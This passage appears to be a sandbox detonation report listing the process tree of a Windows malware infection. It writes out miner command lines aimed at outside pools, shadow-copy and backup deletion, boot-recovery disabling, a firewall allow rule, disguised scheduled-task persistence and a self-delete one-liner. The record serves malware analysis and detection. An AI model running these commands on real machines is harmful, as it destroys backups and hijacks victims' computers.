                                                                                                                                                                                                                                                                                                                                    PID:9944
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" start ryvzqvwe
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                      PID:9252
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:5992
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\76A8.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\76A8.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:8768
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BAC7.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BAC7.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:340
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                          PID:7396
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                            PID:5896
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E5B0.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E5B0.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:7172
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:9504
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:9660
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:9780
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:9900
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:10052
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:10176
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8804
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\ryvzqvwe\txeikndp.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\ryvzqvwe\txeikndp.exe /d"C:\Users\Admin\AppData\Local\Temp\6707.exe"
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:8904
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                              svchost.exe
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8748
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                  svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1048
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:9000
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:9448
                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5012
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                        DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0d2495e1-4518-3748-aca9-0701b736a72a}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8392
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:8904
                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:9480
                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4664
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                              PID:10088
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2296
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8092
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7324
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7004
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:8344
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:9308
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:9352
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:9332
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\wirbfsf
                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\wirbfsf
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8460
                                                                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7124
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\74E1.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\74E1.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -start
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8508
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -agent 0
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:8648
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1104
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5824
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5012
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8920
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5920
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3156
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8516
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4576
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                notepad.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9016
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8201.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8201.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6888
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Clip_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3980
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Red1_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5064
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8436
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10200
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6576
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8128
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8800
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5340
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4164
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2424
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7424
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\VideoDriver.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8948
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\8201.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\8201.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
